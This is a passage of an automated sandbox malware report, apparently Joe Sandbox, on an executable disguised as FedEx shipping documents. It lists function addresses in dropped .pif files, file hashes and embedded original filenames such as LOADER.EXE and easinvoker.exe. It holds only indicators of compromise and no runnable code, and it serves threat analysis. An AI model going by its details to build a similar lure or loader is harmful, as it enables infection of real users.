        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6861207_2_2D686120
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6845007_2_2D684500
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6841E07_2_2D6841E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6825C07_2_2D6825C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D686DA87_2_2D686DA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6809A07_2_2D6809A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6851807_2_2D685180
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D681C607_2_2D681C60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6864407_2_2D686440
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6848207_2_2D684820
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D682C007_2_2D682C00
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6848107_2_2D684810
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6828E07_2_2D6828E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6870C87_2_2D6870C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D680CC07_2_2D680CC0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6854A07_2_2D6854A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6838807_2_2D683880
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6867607_2_2D686760
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D684B407_2_2D684B40
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D682F207_2_2D682F20
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6877087_2_2D687708
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6813007_2_2D681300
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6873E87_2_2D6873E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D680FE07_2_2D680FE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6857C07_2_2D6857C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6873D97_2_2D6873D9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D683BA07_2_2D683BA0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D681F807_2_2D681F80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D684E607_2_2D684E60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6832407_2_2D683240
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6816207_2_2D681620
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D685E007_2_2D685E00
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6816127_2_2D681612
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D685AE07_2_2D685AE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6812F07_2_2D6812F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D683EC07_2_2D683EC0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6822A07_2_2D6822A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D686A807_2_2D686A80
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6806807_2_2D680680
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6965107_2_2D696510
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D696BB87_2_2D696BB8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6900407_2_2D690040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D0207_2_2D69D020
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6909607_2_2D690960
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69B3607_2_2D69B360
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D699B787_2_2D699B78
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6949707_2_2D694970
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69B3707_2_2D69B370
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6909707_2_2D690970
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6957487_2_2D695748
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6975487_2_2D697548
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69CB487_2_2D69CB48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69294A7_2_2D69294A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69E3407_2_2D69E340
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6929587_2_2D692958
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69CB587_2_2D69CB58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6917287_2_2D691728
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69FB287_2_2D69FB28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D698D217_2_2D698D21
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6937207_2_2D693720
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6975397_2_2D697539
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6957387_2_2D695738
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6917387_2_2D691738
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D698D307_2_2D698D30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69E3307_2_2D69E330
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A5087_2_2D69A508
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69BD007_2_2D69BD00
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6965007_2_2D696500
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A5187_2_2D69A518
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69FB187_2_2D69FB18
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6937107_2_2D693710
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6991E87_2_2D6991E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D695BE07_2_2D695BE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A9E07_2_2D69A9E0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D692DE07_2_2D692DE0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6991F87_2_2D6991F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D690DF87_2_2D690DF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69E7F87_2_2D69E7F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D692DF07_2_2D692DF0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69C1C87_2_2D69C1C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D691BC17_2_2D691BC1
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A9D17_2_2D69A9D1
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D691BD07_2_2D691BD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D695BD07_2_2D695BD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D696BA97_2_2D696BA9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D693BAA7_2_2D693BAA
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6983A07_2_2D6983A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D9A07_2_2D69D9A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D693BB87_2_2D693BB8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69C1B87_2_2D69C1B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D9B07_2_2D69D9B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D699B887_2_2D699B88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69F18A7_2_2D69F18A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6949807_2_2D694980
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69F1987_2_2D69F198
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6983907_2_2D698390
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6960697_2_2D696069
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6920687_2_2D692068
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6988687_2_2D698868
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69DE687_2_2D69DE68
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69F6607_2_2D69F660
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6960787_2_2D696078
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69DE787_2_2D69DE78
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6970707_2_2D697070
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6940427_2_2D694042
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A0427_2_2D69A042
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6988587_2_2D698858
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69F6517_2_2D69F651
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6940507_2_2D694050
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69A0507_2_2D69A050
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69B8287_2_2D69B828
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69B8387_2_2D69B838
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D694E087_2_2D694E08
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69E8087_2_2D69E808
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D690E087_2_2D690E08
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D697A027_2_2D697A02
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6900067_2_2D690006
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D694E187_2_2D694E18
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D697A107_2_2D697A10
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D0167_2_2D69D016
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D4E87_2_2D69D4E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6944E87_2_2D6944E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69BCF27_2_2D69BCF2
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6904C97_2_2D6904C9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D697EC87_2_2D697EC8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6924C07_2_2D6924C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6996C07_2_2D6996C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69ECC07_2_2D69ECC0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6904D87_2_2D6904D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D697ED87_2_2D697ED8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6944D87_2_2D6944D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69D4D87_2_2D69D4D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69ECD07_2_2D69ECD0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69AEA87_2_2D69AEA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6912A07_2_2D6912A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6952A27_2_2D6952A2
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69AEA27_2_2D69AEA2
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6924B17_2_2D6924B1
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6952B07_2_2D6952B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6996B07_2_2D6996B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6932887_2_2D693288
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6970807_2_2D697080
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69C6827_2_2D69C682
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D69C6907_2_2D69C690
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C8E087_2_2D6C8E08
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C26887_2_2D6C2688
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CC9687_2_2D6CC968
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C97687_2_2D6C9768
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C13687_2_2D6C1368
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CFB707_2_2D6CFB70
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CDF487_2_2D6CDF48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CAD487_2_2D6CAD48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C13597_2_2D6C1359
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CC3287_2_2D6CC328
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C91287_2_2D6C9128
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CF5287_2_2D6CF528
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CD9087_2_2D6CD908
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C05087_2_2D6C0508
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CA7087_2_2D6CA708
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CA3E87_2_2D6CA3E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CD5E87_2_2D6CD5E8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CF1F87_2_2D6CF1F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CB9C87_2_2D6CB9C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CEBC87_2_2D6CEBC8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C21C07_2_2D6C21C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C09C07_2_2D6C09C0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C09D07_2_2D6C09D0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CCFA87_2_2D6CCFA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C9DA87_2_2D6C9DA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C21B27_2_2D6C21B2
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CE5887_2_2D6CE588
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CB3887_2_2D6CB388
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CB0687_2_2D6CB068
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CE2687_2_2D6CE268
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CC6487_2_2D6CC648
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C94487_2_2D6C9448
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C00407_2_2D6C0040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CF8507_2_2D6CF850
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CAA287_2_2D6CAA28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CDC287_2_2D6CDC28
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C18207_2_2D6C1820
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C18307_2_2D6C1830
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CF2087_2_2D6CF208
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CC0087_2_2D6CC008
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C00077_2_2D6C0007
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CBCE87_2_2D6CBCE8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CEEE87_2_2D6CEEE8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C1CE97_2_2D6C1CE9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C04F87_2_2D6C04F8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C1CF87_2_2D6C1CF8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C3CF97_2_2D6C3CF9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CA0C87_2_2D6CA0C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CD2C87_2_2D6CD2C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CB6A87_2_2D6CB6A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CE8A87_2_2D6CE8A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C0E887_2_2D6C0E88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6CCC887_2_2D6CCC88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C9A887_2_2D6C9A88
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D6C0E987_2_2D6C0E98
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D842ED07_2_2D842ED0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D844A707_2_2D844A70
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8427B07_2_2D8427B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8420C87_2_2D8420C8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8443887_2_2D844388
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D843CA07_2_2D843CA0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8435B87_2_2D8435B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D842EC37_2_2D842EC3
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D844A607_2_2D844A60
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8427A07_2_2D8427A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8420B97_2_2D8420B9
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8400407_2_2D840040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D84437B7_2_2D84437B
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D841D387_2_2D841D38
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D841D487_2_2D841D48
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D843C8F7_2_2D843C8F
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8435A87_2_2D8435A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8493007_2_2D849300
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8412A87_2_2D8412A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8412B87_2_2D8412B8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D8492F07_2_2D8492F0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2DBAB8307_2_2DBAB830
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2DBA06907_2_2DBA0690
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2DBAE8B07_2_2DBAE8B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2DBAE8A07_2_2DBAE8A0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2DBA52707_2_2DBA5270
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2E2E44DF7_2_2E2E44DF
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2E2E37D87_2_2E2E37D8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2E2E00257_2_2E2E0025
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2E2E00407_2_2E2E0040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2F6E53207_2_2F6E5320
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2F6EE3A87_2_2F6EE3A8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2F6EB3697_2_2F6EB369
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2F6EB3787_2_2F6EB378
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_030420B411_2_030420B4
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_0304CFC611_2_0304CFC6
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: 11_2_0304CECD11_2_0304CECD
        Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\Mxhvdwzh.PIF 0009A5BB1BB1542C3663BC48457B7391C940AD8284D92996FA8A058FC4B5A8CC
        Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\hzwdvhxM.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: String function: 0040E1D8 appears 44 times
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: String function: 03044444 appears 154 times
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: String function: 03053E98 appears 50 times
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFCode function: String function: 030445D0 appears 576 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D545D0 appears 832 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D5424C appears 64 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D63E98 appears 56 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D54444 appears 245 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D54270 appears 31 times
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: String function: 02D63F1C appears 45 times
        Source: NETUTILS.dll.0.drStatic PE information: Number of sections : 19 > 10
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500660280.0000000021570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435508711.000000007EE1F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.0000000000786000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
